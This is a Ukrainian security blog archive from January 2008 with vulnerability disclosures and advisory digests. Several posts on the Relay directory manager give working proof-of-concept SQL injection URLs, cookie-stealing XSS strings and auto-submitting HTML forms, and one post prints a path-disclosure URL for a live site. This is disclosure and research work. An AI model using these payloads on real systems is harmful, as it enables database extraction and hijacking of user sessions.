Архів для категорії 'Уразливості'

Уразливість на web.meta.ua

20:27 26.01.2008

27.08.2007

У лютому, 23.02.2007, я знайшов Cross-Site Scripting уразливість на проекті http://web.meta.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Останній раз стосовно проектів компанії Мета я писав про уразливості на bg.meta.ua.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

26.01.2008

XSS:

Дана уразливість вже виправлена.

Уразливості в плагінах для WordPress №5

23:50 25.01.2008

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Wp-FileManager, WP-Forum та Permalinks Migration. Для котрих нещодавно з’явилися експлоіти. Wp-FileManager - це плагін файлового менеджера, WP-Forum - це плагін для створення форума, а Permalinks Migration - це плагін для переходу на використання пермалінків.

  • Wordpress Plugin Wp-FileManager 1.2 Remote Upload Vulnerability (деталі)
  • Wordpress plugin WP-Forum 1.7.4 Remote SQL Injection Vulnerability (деталі)
  • XSRF under Dean’s Permalinks Migration 1.0 (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Добірка уразливостей

16:26 25.01.2008

В даній добірці уразливості в веб додатках:

  • Tor security advisory: cross-protocol http form attack (деталі)
  • Unrestricted file upload vulnerability in webSPELL (деталі)
  • SQL injection vulnerability in webSPELL (деталі)
  • smbftpd 0.96 format string vulnerability (деталі)
  • Call Center Software - Remote Xss Post Exploit (деталі)
  • Blind sql injection attack in INSERT syntax on PHP-nuke <=8.0 Final (деталі)
  • Nabopoll Blind SQL Injection vulnerabilies (деталі)
  • PHP-інклюдинг в MxBB Portal Knowledge Base/mx_kb (деталі)
  • PHP-інклюдинг в MxBB Portal mx_modsdb (деталі)
  • Directory traversal vulnerability in Formbankserver 1.9 (деталі)
  • Multiple cross-site scripting vulnerabilities in AShop Deluxe 4.5 and AShop Administration Panel (деталі)
  • Vulnerability in jgbbs (деталі)
  • Уразливість при обробці стандартних полів в Mantis (деталі)
  • Численні уразливості в WAWI (деталі)
  • Vulnerability in WineGlass (деталі)

Уразливість на expert.com.ua

19:31 24.01.2008

28.02.2007

Нещодавно, 23.02.2007, я знайшов Cross-Site Scripting уразливість на проекті http://expert.com.ua (Інтернет ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Тоді я як раз зайшов почитати новину Intel продемонстрировала в Киеве, как нужно защищать компьютеры, стосовно конференції IDC IT Security Roadshow 2007, котра як раз на днях проходила в Києві. І про сайт компаніїї IDC, що проводила дану конференцію, я згадув учора стосовно уразливості на idc-cema.com.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

24.01.2008

XSS:

Сьогодні я також виявив Full path disclosure уразливість, коли перевіряв дану XSS. Також в листопаді я писав про уразливість в капчі - expert.com.ua CAPTCHA bypass.

Full path disclosure:

http://expert.com.ua/index.php?option=news3-1478′

Дані уразливості досі не виправлені.

Редиректори Гугла

23:43 23.01.2008

В пошуковій системі Google є чимало редиректорів (redirectors). Пропоную вашій увазі повний перелік редиректорів Гугла, що я знайшов в минулому році.

Про деякі редиректори Гугла я вже розповідав раніше:

Ось нові редиректори на різних доменах Гугла:

Дані 5 редиректорів ще працювали у вересні минулого року, але зараз Гугл їх вже прикрив. Але ще 3 редиректора нормально працюють.

Добірка уразливостей

18:22 23.01.2008

В даній добірці уразливості в веб додатках:

  • Memory overwrites in JVM via malformed TrueType font (деталі)
  • Untrusted Java applet can connect to localhost (деталі)
  • MyCalendar multiple XSS (деталі)
  • Htaccess Passwort Generator 1.1 (ht_pfad) RFI Vulnerability (деталі)
  • Snitz Forums 2000 Version 3.1 SR4 (pop_profile.asp) Remote SQL Injection Vulnerability (деталі)
  • SQL injection vulnerability in webSPELL (деталі)
  • Authentication bypass in webSPELL (деталі)
  • Міжсайтовий скриптінг в ShopSite (деталі)
  • Vulnerability in Geckovich TaskTracker Pro (деталі)
  • PHP remote file inclusion vulnerability in OpenPinboard 2.0 (деталі)
  • PHP-інклюдинг в MxBB Portal mx_newssuite (деталі)
  • PHP-інклюдинг в BLOG:CMS (деталі)
  • SQL injection vulnerability in Vizayn Haber (деталі)
  • SQL injection vulnerability in ASP SiteWare autoDealer (деталі)
  • Cross-site scripting (XSS) vulnerability in Belchior Foundry vCard PRO (деталі)

Нові уразливості в Relay

23:53 22.01.2008

Нещодавно я вже писав про уразливості в Relay. І два дні тому, 20.01.2008, я знайшов нові SQL Injection та Cross-Site Scripting уразливості у веб додатку Relay (ajax directory manager).

SQL Injection:

http://site/relay/management/index.php?page=manage&module=users&action=details&uid=-1%20or%20id=1
http://site/relay/management/index.php?page=manage&module=users&action=details&uid=1%20and%20substring(username,1,1)=char(109)

http://site/relay/management/index.php?page=manage&module=clients&action=details&cid=-1%20or%20id=1
http://site/relay/management/index.php?page=manage&module=clients&action=details&cid=1%20and%20substring(version(),1,1)=3

XSS:

http://site/relay/management/index.php?page=manage&module=users&action=details&uid=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/relay/management/index.php?page=manage&module=clients&action=details&cid=%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (Persistent):

http://site/relay/relay.php?relay=getFile&fileid=-1%20or%201=1/*%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливість в логах, де зберігається інформація про файли, які були скачені. При перегляді логів адміном на сторінці http://site/relay/management/index.php?page=stats&module=gen& action=latest XSS код буде виконано.

Вразлива версія Relay beta 1.0 (та попередні версії). Про уразливості розробникам веб додатка я повідомлю найближчим часом.

Уразливість на poshuk.com

20:22 22.01.2008

25.08.2007

У лютому, 22.02.2007, я знайшов Cross-Site Scripting уразливість на проекті http://poshuk.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше.

22.01.2008

XSS:

Дана уразливість досі не виправлена.

Добірка уразливостей

16:28 21.01.2008

В даній добірці уразливості в веб додатках:

  • SAXON version 5.4 XSS Attack Vulnerability (деталі)
  • teatro 1.6 ( basePath ) Remote File Include Vulnerability (деталі)
  • TikiWiki Remote PHP Code Evaluation Vulnerability (деталі)
  • New elinks packages fix information disclosure (деталі)
  • ESupport Multiple HTML Injection Vulnerabilities (деталі)
  • MediaWiki Cross-site Scripting (деталі)
  • XLAtunes 0.1 (album) Remote SQL Injection Vulnerability (деталі)
  • New links2 packages fix arbitrary shell command execution (деталі)
  • Vulnerability in com_categories in Joomla! (деталі)
  • PHP-інклюдинг в PhpLeague (деталі)
  • Міжсайтовий скриптінг і SQL-ін’єкція в Messageriescripthp (деталі)
  • Multiple vulnerabilities in Joomla! (деталі)
  • SQL injection vulnerability in Neocrome Land Down Under (LDU) (деталі)
  • File Upload Manager <= 1.0.6 (detail.asp) Remote SQL Injection Exploit (деталі)
  • SQL-ін’єкція в jclarens (деталі)

Уразливості в Relay

20:25 20.01.2008

29.10.2007

У травні, 26.05.2007, я знайшов SQL Injection та Cross-Site Scripting уразливості у веб додатку Relay (ajax directory manager).

Деталі уразливості з’являться пізніше, спочатку повідомлю розробникам веб додатка.

20.01.2008

SQL Injection:

http://site/relay/relay.php?relay=getFile&fileid=-1%20or%20id=1151513788
http://site/relay/relay.php?relay=getFile&fileid=1151513788%20and%20substring(version(),1,1)=3

XSS (Persistent):

На сторінці http://site/relay/relay.html

<img src='' onerror='javascript:alert(document.cookie)'>В полі: name.

PoC:

relay XSS.html

<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/relay/relay.php" method="post">
<input type="hidden" name="relay" value="setMeta">
<input type="hidden" name="fileid" value="1151513788">
<input type="hidden" name="filename" value="relay bird.jpg<img src='' onerror='javascript:alert(document.cookie)'>">
<input type="hidden" name="description" value="">
<input type="hidden" name="flags" value="normal">
</form>
</body>

На сторінці http://site/relay/relay.html

</textarea><img src='' onerror='javascript:alert(document.cookie)'>В полі: description.

PoC:

relay XSS2.html

<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/relay/relay.php" method="post">
<input type="hidden" name="relay" value="setMeta">
<input type="hidden" name="fileid" value="1151513788">
<input type="hidden" name="filename" value="relay bird.jpg">
<input type="hidden" name="description" value="</textarea><img src='' onerror='javascript:alert(document.cookie)'>">
<input type="hidden" name="flags" value="normal">
</form>
</body>

XSS:

На сторінці http://site/relay/relay.html

<img src='' onerror='javascript:alert(document.cookie)'>В полі: searchbar.

Вразлива версія Relay beta 1.0. Для виконання SQL Injection необхідно мати акаунт в системі (будь-то акаунт адміна чи користувача). А XSS уразливості можуть бути використані проти усіх користувачів системи.